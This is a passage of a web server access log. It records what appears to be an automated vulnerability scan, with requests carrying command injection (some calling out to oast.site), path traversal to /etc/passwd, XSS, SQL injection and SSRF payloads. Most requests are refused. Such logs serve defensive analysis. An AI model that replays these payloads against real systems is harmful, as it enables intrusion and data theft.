9%29%29%7D HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/117.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /remote/loginredir?redir=javascript:alert(document.domain) HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15241.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /webadmin/script?command=|%20nslookup%20ct4hu7d65jrdcfcsg340bc6dttj5qjdbk.oast.site HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "POST /invoker/readonly HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/123.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "POST /RPC2 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "PUT /2pVJVnfjuOFHiazkCF1UYXVV0IY.jsp/ HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /2pVJVnfjuOFHiazkCF1UYXVV0IY.jsp HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 405 150 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /xda/help/en/default.htm?startat=//oast.me HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/103.0" 172.18.0.4 - maint [29/Nov/2024:09:55:51 +0800] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" 172.18.0.4 - maint [29/Nov/2024:09:55:51 +0800] "POST /maint/index.php?packages HTTP/1.1" 404 146 "96.9.228.88:888/maint/index.php?packages" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 172.18.0.4 - maint [29/Nov/2024:09:55:51 +0800] "GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1" 404 548 "96.9.228.88:888/maint/index.php?packages" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /static/../../../a/../../../../etc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /webadmin/pkg?command= HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "POST / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /2pVJVfWPRakJMVMkBkOiwE1Ttc1.php%5Cx0A HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 403 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:51 +0800] "GET /.env HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:52 +0800] "GET /CMSInstall/install.aspx HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" 172.18.0.4 - - [29/Nov/2024:09:55:52 +0800] "GET /plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\x5C%27%20or%20mid=@`\x5C%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\x5C%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/604.1.28 (KHTML, like Gecko) Version/9.1.2 Safari/604.1.28" 172.18.0.4 - - [29/Nov/2024:09:55:52 +0800] "GET /composer/send_email?to=DlBe@jqDd&url=http://ct4hu7d65jrdcfcsg3403mdnk1jquirgc.oast.site HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.38" 172.18.0.4 - - [29/Nov/2024:09:55:52 +0800] "POST / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 172.18.0.4 - - [29/Nov/2024:09:55:52 +0800] "GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 403 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 15230.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "POST /integration/saveGangster.action HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://ct4hu7d65jrdcfcsg340ebe4o9bzoxcqu.oast.site HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName&redirect=%2f%5cinteract.sh HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /passwordrecovered.cgi?id=S6DR7 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET / HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /current_config/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; it-it) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.15" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /verify.php?id=1&confirm_hash HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /current_config/Sha1Account1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.41" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.50" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "OPTIONS / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /base_import/static/etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /logos_clients/2pVJVn6DMTywW0WP8UbQbQcPxTx.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /hw-sys.htm HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 OS/10.0.22631" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "POST /clients/editclient.php?id=2pVJVn6DMTywW0WP8UbQbQcPxTx&action=update HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "POST /orders/3 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /__ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1481.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 15231.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /dumpmdm.cmd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.2277.112" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.6.21" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" 172.18.0.4 - - [29/Nov/2024:09:55:53 +0800] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /sympa?referer=http://interact.sh&passwd&previous_action&action=login&action_login&previous_list&list&email HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://ct4hu7d65jrdcfcsg340uj7s5b4y99gsc.oast.site HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "POST /cobbler_api HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "POST /nagiosql/admin/menuaccess.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/9.1.2 Safari/602.2.14" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/119.0.2151.97" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /uir//etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.33" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2012861586))%23 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux aarch64; rv:100.0) Gecko/20100101 Firefox/100.0" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "POST /nagiosql/admin/logbook.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "POST /system/sharedir.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5(2041674014))%23 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 maglev/23306.3315.2560.6525/49" 172.18.0.4 - - [29/Nov/2024:09:55:54 